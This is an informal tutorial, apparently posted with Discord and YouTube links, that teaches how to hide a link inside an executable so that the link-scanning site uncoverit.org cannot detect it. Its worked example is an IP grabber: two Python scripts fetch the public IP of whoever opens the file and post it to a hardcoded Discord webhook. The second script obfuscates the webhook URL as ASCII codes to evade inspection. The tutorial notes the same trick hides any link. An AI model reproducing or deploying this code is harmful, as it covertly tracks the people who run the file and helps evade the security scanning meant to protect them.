If you still dont understand the tutorial, join the discord: https://discord.gg/bb3Z5VrPwk
if the discord link is invalid, go to my youtube: https://youtube.com/@17xet and comment that u need help.

==========================================


Tutorial how to hide link in a .exe. This tool is made for the website uncoverit.org that exposes any links in a exe.

In this tutorial i will use an ip grabber for example

CAUTION: you can use this to hide any link so not only webhooks!

==========================================

How to Send Your IP to a Discord Webhook (Before and After Using ASCII Encoding)
What you want to do:
Send your public IP address to a Discord webhook when a file/script is run.

==========================================
Before: Using the Plain Webhook URL
Webhook URL:

https://discord.com/api/webhooks/1399128918824587314/pHtss5nCnL5-1CNRG1BceYFP28nIyjfWL1SAFtNJTGF3WwyVX84Qu9oEtjjAoqPsgM1b
==========================================

==========================================
==========================================
Example Python Code:
==========================================

import requests

def get_public_ip():
    try:
        return requests.get('https://api.ipify.org').text
    except:
        return "Could not retrieve IP"

def send_ip_to_webhook():
    webhook_url = "https://discord.com/api/webhooks/1399128918824587314/pHtss5nCnL5-1CNRG1BceYFP28nIyjfWL1SAFtNJTGF3WwyVX84Qu9oEtjjAoqPsgM1b"
    ip = get_public_ip()
    message = f"User opened the file! IP: {ip}"
    response = requests.post(webhook_url, json={"content": message})
    if response.status_code == 204:
        print("IP sent successfully!")
    else:
        print(f"Failed to send IP. Status code: {response.status_code}")

send_ip_to_webhook()

==========================================
==========================================


After: Using ASCII Codes to Hide the Webhook URL

Webhook URL ASCII codes:
104 116 116 112 115 58 47 47 100 105 115 99 111 114 100 46 99 111 109 47 97 112 105 47 119 101 98 104 111 111 107 115 47 49 51 57 57 49 50 56 57 49 56 56 50 52 53 56 55 51 49 52 47 112 72 116 115 115 53 110 67 110 76 53 45 49 67 78 82 71 49 66 99 101 89 70 80 50 56 110 73 121 106 102 87 76 49 83 65 70 116 78 74 84 71 70 51 87 119 121 86 88 56 52 81 117 57 111 69 116 106 106 65 111 113 80 115 103 77 49 98

==========================================

==========================================
Example Python Code to Decode and Send IP:
==========================================

import requests

def decode_ascii_to_url(ascii_codes):
    return ''.join(chr(int(code)) for code in ascii_codes.split())

def get_public_ip():
    try:
        return requests.get('https://api.ipify.org').text
    except:
        return "Could not retrieve IP"

def send_ip_to_webhook(ascii_codes):
    webhook_url = decode_ascii_to_url(ascii_codes)
    ip = get_public_ip()
    message = f"User opened the file! IP: {ip}"
    response = requests.post(webhook_url, json={"content": message})
    if response.status_code == 204:
        print("IP sent successfully!")
    else:
        print(f"Failed to send IP. Status code: {response.status_code}")

ascii_webhook = "104 116 116 112 115 58 47 47 100 105 115 99 111 114 100 46 99 111 109 47 97 112 105 47 119 101 98 104 111 111 107 115 47 49 51 57 57 49 50 56 57 49 56 56 50 52 53 56 55 51 49 52 47 112 72 116 115 115 53 110 67 110 76 53 45 49 67 78 82 71 49 66 99 101 89 70 80 50 56 110 73 121 106 102 87 76 49 83 65 70 116 78 74 84 71 70 51 87 119 121 86 88 56 52 81 117 57 111 69 116 106 106 65 111 113 80 115 103 77 49 98"

send_ip_to_webhook(ascii_webhook)

==========================================
==========================================

Why use ASCII encoding?
Hides the webhook URL in plain sight from anyone casually reading your source code.

Adds a simple obfuscation layer to protect your webhook URL.

Useful if you want to keep your webhook less obvious in your scripts.
